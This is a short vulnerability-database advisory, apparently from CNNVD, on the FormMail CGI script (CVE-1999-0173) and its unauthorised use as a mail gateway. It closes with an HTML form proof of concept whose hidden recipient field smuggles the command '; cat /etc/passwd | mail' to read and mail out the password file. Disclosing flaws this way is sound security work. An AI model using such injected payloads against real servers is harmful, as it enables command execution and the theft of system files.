FormMail CGI程序漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105274 漏洞类型 未知
发布时间 1997-01-01 更新时间 2006-09-05
CVE编号 CVE-1999-0173 CNNVD-ID CNNVD-199701-009
漏洞平台 Unix CVSS评分 5.0

FormMail is a widely-used web-based e-mail gateway, which allows form-based input to be emailed to a specified user.

A web server can use a remote site's FormMail script without authorization, using remote system resources or exploiting other vulnerabilities in the script. For example, this issue can be used to exploit BID 2079, "Matt Wright FormMail Remote Command Execution Vulnerability". 

<body><form method="post" action="">
<input type="hidden" name="recipient" value="; cat /etc/passwd | mail">
<input type="submit" name="submit" value="submit">